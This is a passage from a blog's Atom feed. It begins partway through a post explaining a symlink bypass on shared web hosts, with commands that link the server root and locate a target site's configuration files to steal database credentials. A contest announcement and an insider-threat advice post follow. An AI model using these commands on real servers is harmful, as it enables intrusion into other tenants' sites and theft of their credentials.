&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-z1VWbfIvCwI/Tx8hLT_rWwI/AAAAAAAABuA/LCvCqfnu_5I/s1600/3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="464" src="http://2.bp.blogspot.com/-z1VWbfIvCwI/Tx8hLT_rWwI/AAAAAAAABuA/LCvCqfnu_5I/s640/3.jpg" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;br /&gt;
&lt;b&gt;Step 4 - &lt;/b&gt;The hacker connects to the izri script and then gives the following commands&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="font-family: 'Times New Roman', serif; font-size: 11pt; line-height: 115%;"&gt;mkdir 1111&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="font-family: 'Times New Roman', serif; font-size: 11pt; line-height: 115%;"&gt;cd 1111&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="font-family: 'Times New Roman', serif; font-size: 11pt; line-height: 115%;"&gt;ln -s / root&lt;/span&gt;&lt;/b&gt;&lt;span style="font-family: 'Times New Roman', serif; font-size: 11pt; line-height: 115%;"&gt; &lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="font-family: 'Times New Roman', serif; font-size: 11pt; line-height: 115%;"&gt;ls -la /etc/valiases/(site.com)&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="font-family: 'Times New Roman', serif; font-size: 11pt; line-height: 115%;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: 'Times New Roman', serif; font-size: 11pt; line-height: 115%;"&gt;The first command creates a directory named 1111(Mkdir 1111). The next command navigates to the directory(cd 1111). The third command creates the symlink of the root. The fourth command will extract the user name of the website you put in place of site.com.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: 'Times New Roman', serif; font-size: 11pt; line-height: 115%;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: 'Times New Roman', serif; font-size: 11pt; line-height: 115%;"&gt;The target website is entered in ls - la /etc/valiases/site.com.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: 'Times New Roman', serif; font-size: 11pt; line-height: 115%;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-5mW-V0gf0Ts/Tx8iOIKJGhI/AAAAAAAABuI/Apo3pft-OpQ/s1600/4.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="74" src="http://1.bp.blogspot.com/-5mW-V0gf0Ts/Tx8iOIKJGhI/AAAAAAAABuI/Apo3pft-OpQ/s640/4.JPG" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-ObjL-oK3qw0/Tx8iOw1tTII/AAAAAAAABuM/ddHt4Xgl7GA/s1600/5.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="84" src="http://2.bp.blogspot.com/-ObjL-oK3qw0/Tx8iOw1tTII/AAAAAAAABuM/ddHt4Xgl7GA/s640/5.JPG" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-SjvWgSmXFE4/Tx8iPSAaueI/AAAAAAAABuU/MN44Fubd3tQ/s1600/6.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="104" src="http://2.bp.blogspot.com/-SjvWgSmXFE4/Tx8iPSAaueI/AAAAAAAABuU/MN44Fubd3tQ/s640/6.JPG" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-PYjJ6idbIc8/Tx8iQDLbIqI/AAAAAAAABuc/8p-oJ3KuR-c/s1600/7.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="82" src="http://2.bp.blogspot.com/-PYjJ6idbIc8/Tx8iQDLbIqI/AAAAAAAABuc/8p-oJ3KuR-c/s640/7.JPG" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-qcqAIyUPbRo/Tx8iQwtAjOI/AAAAAAAABuo/CtXvjVjTgYQ/s1600/8.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="92" src="http://1.bp.blogspot.com/-qcqAIyUPbRo/Tx8iQwtAjOI/AAAAAAAABuo/CtXvjVjTgYQ/s640/8.JPG" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-SPwQNZWDsUQ/Tx8iR8iHJrI/AAAAAAAABuw/FmtlWS6dHpg/s1600/9.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="94" src="http://3.bp.blogspot.com/-SPwQNZWDsUQ/Tx8iR8iHJrI/AAAAAAAABuw/FmtlWS6dHpg/s640/9.JPG" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-W3s1clBW4B4/Tx8iUGwyQ0I/AAAAAAAABvE/UNMK7jF-TWE/s1600/12.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="70" src="http://2.bp.blogspot.com/-W3s1clBW4B4/Tx8iUGwyQ0I/AAAAAAAABvE/UNMK7jF-TWE/s640/12.JPG" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style="font-family: 'Times New Roman', serif; font-size: 11pt; line-height: 115%;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: 'Times New Roman', serif; font-size: 11pt; line-height: 115%;"&gt;The above screenshot explains the whole story. The hacker then navigates to the "1111" directory and the configuration file of the target website is created there. The hacker downloads the configuration files and uses the information to access the database and there he can make any changes.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: 'Times New Roman', serif; font-size: 11pt; line-height: 115%;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;a href="http://3.bp.blogspot.com/-3BvOaTGOB_E/Tx8kGyVooEI/AAAAAAAABvo/KfASPjswpwA/s1600/15.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"&gt;&lt;img border="0" height="232" src="http://3.bp.blogspot.com/-3BvOaTGOB_E/Tx8kGyVooEI/AAAAAAAABvo/KfASPjswpwA/s640/15.jpg" width="577" /&gt;&lt;/a&gt; &lt;br /&gt;
&lt;span style="font-family: 'Times New Roman', serif; font-size: 11pt; line-height: 115%;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-uMzM0Cdh2mA/Tx8kFiT1iDI/AAAAAAAABvg/wRwMwd8nKQY/s1600/14.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="604" src="http://1.bp.blogspot.com/-uMzM0Cdh2mA/Tx8kFiT1iDI/AAAAAAAABvg/wRwMwd8nKQY/s640/14.jpg" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;span style="font-family: 'Times New Roman', serif;"&gt;&lt;span style="font-size: 15px; line-height: 17px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: 'Times New Roman', serif; font-size: 11pt; line-height: 115%;"&gt;&lt;b&gt;How To Be Protected?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: 'Times New Roman', serif; font-size: 11pt; line-height: 115%;"&gt;&lt;br /&gt;
There is nothing much you can do it on your end, else then renaming your config and moving it to a safer place. If you are worried about your website's security, Feel free to contact me.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: 'Times New Roman', serif; font-size: 11pt; line-height: 115%;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: 'Times New Roman', serif; font-size: 11pt; line-height: 115%;"&gt;&lt;b&gt;About The Author:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: 'Times New Roman', serif; font-size: 11pt; line-height: 115%;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: 'Times New Roman', serif; font-size: 11pt; line-height: 115%;"&gt;Avinash is a security researcher and a blogger. He runs a blog &lt;a href="http://avisuni.blogspot.com/"&gt;http://avisuni.blogspot.com&lt;/a&gt;, where her writes about hacking. He promises to be a regular contributer here at RHA and &lt;b&gt;&lt;a rel="no follow" href="http://rafayhackingarticles.net/"&gt;RHA&lt;/a&gt;&lt;/b&gt; welcomes talent.&amp;nbsp;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3121270199089759062-1528074171168998423?l=www.rafayhackingarticles.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=1bmzQdBNo4o:I_hR9ipehmA:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=1bmzQdBNo4o:I_hR9ipehmA:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=1bmzQdBNo4o:I_hR9ipehmA:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=1bmzQdBNo4o:I_hR9ipehmA:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=1bmzQdBNo4o:I_hR9ipehmA:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=1bmzQdBNo4o:I_hR9ipehmA:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=1bmzQdBNo4o:I_hR9ipehmA:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=1bmzQdBNo4o:I_hR9ipehmA:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=1bmzQdBNo4o:I_hR9ipehmA:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=1bmzQdBNo4o:I_hR9ipehmA:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=1bmzQdBNo4o:I_hR9ipehmA:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/1bmzQdBNo4o" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/1528074171168998423/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2012/01/hack-website-on-shared-host-symlink.html#comment-form" title="5 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/1528074171168998423?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/1528074171168998423?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/1bmzQdBNo4o/hack-website-on-shared-host-symlink.html" title="How Hackers Are Hacking Into Websites On Shared Hosts - Symlink Bypass Explained" /><author><name>Rafay Baloch</name><uri>http://www.blogger.com/profile/15944091083959815608</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="21" height="32" src="http://2.bp.blogspot.com/-Oq2sCvNga_8/TkK_2qTfs-I/AAAAAAAABXY/GpgdW28vfHM/s220/226160_10150278468603001_538643000_7900302_426914_n.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-T4DuSQdxOG0/Tx8lLPoG8XI/AAAAAAAABvw/taSuejh6mGk/s72-c/access-denied.jpg" height="72" width="72" /><thr:total>5</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2012/01/hack-website-on-shared-host-symlink.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DE4CSHc8eSp7ImA9WhRUE0Q.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-5360510682612521134</id><published>2012-01-24T01:22:00.002-08:00</published><updated>2012-01-24T01:22:49.971-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-24T01:22:49.971-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="contests" /><title>January 2012 Contest Sponsor For RHA - PentestMag</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-G7lW5HSOEsw/TxmjpwFo-qI/AAAAAAAABso/x8mB4TRBTcE/s1600/Untitled.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="RHA contest" border="0" src="http://4.bp.blogspot.com/-G7lW5HSOEsw/TxmjpwFo-qI/AAAAAAAABso/x8mB4TRBTcE/s1600/Untitled.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Due to a tremendous response of readers and huge number of participants of the last contest&amp;nbsp;&lt;b&gt;&lt;a href="http://www.rafayhackingarticles.net/2011/12/december-2011-contest-sponsor-for-rha.html"&gt;ElearnSecurity&lt;/a&gt;&lt;/b&gt;, we decided to setup another contest for RHA readers.  We have partnered with pentestmag.com and arranged a contest for our readers, The winners will be handed over with prizes worth up to 1400$.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;b&gt;PenTest Magazine &lt;/b&gt;is a weekly downloadable IT security mag, devoted exclusively to penetration testing. It features articles by penetration testing specialists and enthusiasts, experts in vulnerability assessment and management. We cover all aspects of pen testing, from theory to practice, from methodologies and standards to tools and real-life solutions. Each magazine features a cover focus, and articles from our regular contributors, covering IT security news and up-to-date topics.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;[1ST PRIZE]1 Year Full Subscription Of Magazines[Worth 180$]&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-SzZnaPBxI78/TxmhXfuU5LI/AAAAAAAABsY/y-gV4u4mOJQ/s1600/ok%25C5%2582adka.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="RHA contest" border="0" height="400" src="http://4.bp.blogspot.com/-SzZnaPBxI78/TxmhXfuU5LI/AAAAAAAABsY/y-gV4u4mOJQ/s400/ok%25C5%2582adka.jpg" width="276" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;The winner will get full one year access to the amazing pentest magazine.&amp;nbsp;&lt;/div&gt;&lt;br /&gt;
&lt;b&gt;[2ND PRIZE]"Analyzing Computer Security" by Charles P. Pfleeger and Shari Lawrence Pfleeger.[Worth 110$]&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;&lt;a href="http://my.safaribooksonline.com/book/networking/security/9780132789493"&gt;&lt;img border="0" height="320" src="http://4.bp.blogspot.com/-V_jKy4zABPc/TxmeY45SoUI/AAAAAAAABsQ/Rd8YZFklZVI/s320/500x500_1034862_file.jpeg" width="245" /&gt;&lt;/a&gt; &lt;/div&gt;&lt;br /&gt;
&lt;i&gt;Analyzing Computer Security is a fresh, modern, and relevant introduction to computer security. Organized around today’s key attacks, vulnerabilities, and countermeasures, it helps you think critically and creatively about computer security–so you can prevent serious problems and mitigate those that still occur.&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;[3RD PRIZE] 10 Winners For 2 Months Of Subscription [Worth 200$]&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;10 random winners will get 2 months of access to the magazine.&lt;/i&gt;&lt;br /&gt;
&lt;h4&gt;How To Participate&lt;/h4&gt;&lt;br /&gt;
&lt;b&gt;1. &lt;/b&gt;First of all you need to register for a free account on&lt;b&gt;&lt;a href="http://pentestmag.com/wp-login.php?action=register"&gt;http://pentestmag.com/wp-login.php?action=register&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;2.&lt;/b&gt; Next you need to share this &lt;b&gt;contest page&lt;/b&gt; with your friends on Facebook, Twitter, Digg, Delicious, yahoo groups, facebook groups, like page etc.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;3. &lt;/b&gt;Lastly you would need to post a comment telling us briefly &lt;b&gt;"Why Do You think, you Should Be Choosen As A Winner?"&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;How To Win?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;[First Prize] &lt;/b&gt;The person with the most number of shares and the most impressive answer to the above question will win the first prize of penetration testing pro course.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;[Second Prize] &lt;/b&gt;The person with the second most number of shares and an impressive answer to the question will win &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;i&gt;Note: The answer carries more weight than your shares, which means that if you have the most shares and not a very impressive answer, You may move to the second and third position.&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;[Third Prize]&lt;/b&gt;The third prize will be chosen via a lucky draw,&lt;br /&gt;
&lt;br /&gt;
Here is an example:&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;Hello my name is "ABC", My email address is abc@gmail.com, I have liked your page and have shared this post on following places:&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;My Facebook Profile : http://facebook.com/risepk&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;My FanPage Profile with 1,437 fans : http://facebook.com/risepks&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;My Google + Profile : http://gplus.to/risepk&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;My Tumblr BLog : http://risepk.tumblr.com&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;My Twitter Profile having 557 followers : http://twitter.com/risepk&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;My Linked in Profile : http://pk.linkedin.com/in/risepk&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;My Stumble Profile : http://www.stumbleupon.com/stumbler/risepk/all/&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;My Digg Profile : http://digg.com/faizmuhammadkhan&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;My Delicious profile : http://www.delicious.com/risepk&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;I would like to be choosen as a winner because &amp;lt;Your messsage&amp;gt;.&lt;/i&gt;&lt;br /&gt;
&lt;h4&gt;When will the winners be announced?&lt;/h4&gt;The winners will probably announced in the first week of Feb. We wish you best of luck.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3121270199089759062-5360510682612521134?l=www.rafayhackingarticles.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=_6APSi5BJII:6HC5hEeu46w:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=_6APSi5BJII:6HC5hEeu46w:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=_6APSi5BJII:6HC5hEeu46w:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=_6APSi5BJII:6HC5hEeu46w:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=_6APSi5BJII:6HC5hEeu46w:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=_6APSi5BJII:6HC5hEeu46w:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=_6APSi5BJII:6HC5hEeu46w:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=_6APSi5BJII:6HC5hEeu46w:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=_6APSi5BJII:6HC5hEeu46w:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=_6APSi5BJII:6HC5hEeu46w:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=_6APSi5BJII:6HC5hEeu46w:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/_6APSi5BJII" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/5360510682612521134/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2012/01/january-2012-contest-sponsor-for-rha.html#comment-form" title="13 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/5360510682612521134?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/5360510682612521134?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/_6APSi5BJII/january-2012-contest-sponsor-for-rha.html" title="January 2012 Contest Sponsor For RHA - PentestMag" /><author><name>Rafay Baloch</name><uri>http://www.blogger.com/profile/15944091083959815608</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="21" height="32" src="http://2.bp.blogspot.com/-Oq2sCvNga_8/TkK_2qTfs-I/AAAAAAAABXY/GpgdW28vfHM/s220/226160_10150278468603001_538643000_7900302_426914_n.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-G7lW5HSOEsw/TxmjpwFo-qI/AAAAAAAABso/x8mB4TRBTcE/s72-c/Untitled.png" height="72" width="72" /><thr:total>13</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2012/01/january-2012-contest-sponsor-for-rha.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CkIEQX89eyp7ImA9WhRUFE4.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-3493825831003460069</id><published>2012-01-23T12:43:00.000-08:00</published><updated>2012-01-24T10:41:40.163-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-24T10:41:40.163-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Security tips" /><title>How To Deal With Insider Threats?</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-8f9W7v-iAMM/Tx3GIpCAKTI/AAAAAAAABtg/efJ1l505zoM/s1600/insider_threat.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="426" src="http://3.bp.blogspot.com/-8f9W7v-iAMM/Tx3GIpCAKTI/AAAAAAAABtg/efJ1l505zoM/s640/insider_threat.jpg" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
The biggest threats to IT security don’t originate from outside a company. Employees, contractors, and business partners on the inside pose a far greater security risk. As long as your current or former staff and associates have access to your internal network, you are vulnerable to a security breach.&lt;br /&gt;
&lt;br /&gt;
Here’s how to deal with the real and significant threat of attack from insiders, and avoid the widespread damage they can unleash on your company’s finances and reputation.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;strong&gt;First: Assess the Risk&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
For most firms, implementing full protection against every possible threat is not feasible. It makes more sense to assess the risk, determining which data is critical and which is relatively unimportant. Protect critical resources first.&lt;br /&gt;
&lt;br /&gt;
Next, decide who needs access to the network. Make sure that individuals such as partners, suppliers and contractors have access only to the information they need to serve your company or customers.&lt;br /&gt;
&lt;br /&gt;
The third step in assessing risk is determining who are the &lt;a href="http://www.rafayhackingarticles.net/2010/02/protection-against-spywares-and.html"&gt;potential threats&lt;/a&gt;, why they would want access to the network, and how they could gain entry. At this stage, many organizations only consider external threats: competitors, random hackers or former employees. Don’t neglect analyzing your insider threats, as well – including the staffers tasked with protecting the system.&lt;br /&gt;
&lt;br /&gt;
Once you’ve uncovered vulnerabilities, you can take steps to prevent an insider attack.&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Implement Preventative Measures&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
Among the best practices for preventing insider threats are:&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;Institute clear policies and controls; be sure all employees are aware of acceptable network use and what constitutes a breach.&lt;/li&gt;
&lt;li&gt;Enforce policies consistently; maintain proper paper trails.&lt;/li&gt;
&lt;li&gt;Implement security awareness training; reinforce its importance.&lt;/li&gt;
&lt;li&gt;Segregate duties to reduce risk.&lt;/li&gt;
&lt;li&gt;Encourage employees to come forward and identify suspicious behavior, malicious insiders, threats against the company or attempts at exploitation.&lt;/li&gt;
&lt;li&gt;Implement proper system administration safeguards on critical servers.&lt;/li&gt;
&lt;li&gt;Monitor trusted users.&lt;/li&gt;
&lt;li&gt;Audit access to customer information.&lt;/li&gt;
&lt;/ul&gt;In addition, you’ll want all the usual technical protection against spyware, malware and viruses, firewalls, and regular security patches. Consider securing the physical space as well, with entry and exit controls and badges to monitor employees, delivery people and visitors. You want to hire security personnel to discourage criminal activity.&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Finally, Know Whom You’re Hiring&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
Failing to thoroughly check out a potential hire leaves a company vulnerable to insider threats. It goes without saying that thorough background checks are necessary for any prospective new employee who will have access to sensitive information, from customer credit card numbers to crucial application source codes. But for better protection, extend that practice to all employees and contractors.&lt;br /&gt;
&lt;br /&gt;
Background checks should include a criminal history report, a credentials check and a credit check. Hiring managers should verify past employment and speak to former employers regarding the applicant’s history of dealing with workplace issues. Any information gathered should be part of the decision-making process.&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Monitor Employee Behavior&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
Once an employee is hired, be sure supervisors are tasked with reporting any strange or inappropriate behavior. Compare such incidents to systems logs to determine if anything unusual is happening. And remember to enforce all security policies. If employees learn they can get away with small violations, they may be emboldened to move on to bigger and more lucrative security breaches.&lt;br /&gt;
&lt;br /&gt;
